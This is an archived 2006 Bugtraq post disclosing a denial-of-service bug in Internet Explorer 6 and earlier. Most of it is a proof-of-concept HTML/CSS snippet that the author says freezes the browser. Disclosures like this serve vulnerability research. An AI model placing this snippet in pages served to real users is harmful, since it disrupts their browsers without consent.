Bugtraq mailing list archives

IE <= 6 DoS vulnerability

From: jonasschaub () gmail com
Date: 13 Jul 2006 23:56:47 -0000

<!--
# Internet Explorer <= 6 DoS vulnerability
#
# tested IE6 on XPx64 and IE 5.1, 5.5 and 6 on XP SP2 (eng)
# all versions are vulnerable
# ie 7 (beta 2 and 3) are not affected
#
# this malicious css code freezes/ dos the internet explorer
# prior version 7 and stops any user interaction
# the absolute size of the div element does not matter but has
# to be higher than the input's one
#
# 07/14/2006 by jonasschaub () gmail com
# http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/
#
-->

<style type="text/css">

input
{
        width:35px;
        float:left;
}

</style>

<div style="width:50px;">
        <span>
                <span style="position:relative;">
                        <input />
                </span>
                <input />
                <input />
        </span>
</div>

Current thread:

IE <= 6 DoS vulnerability jonasschaub (Jul 14)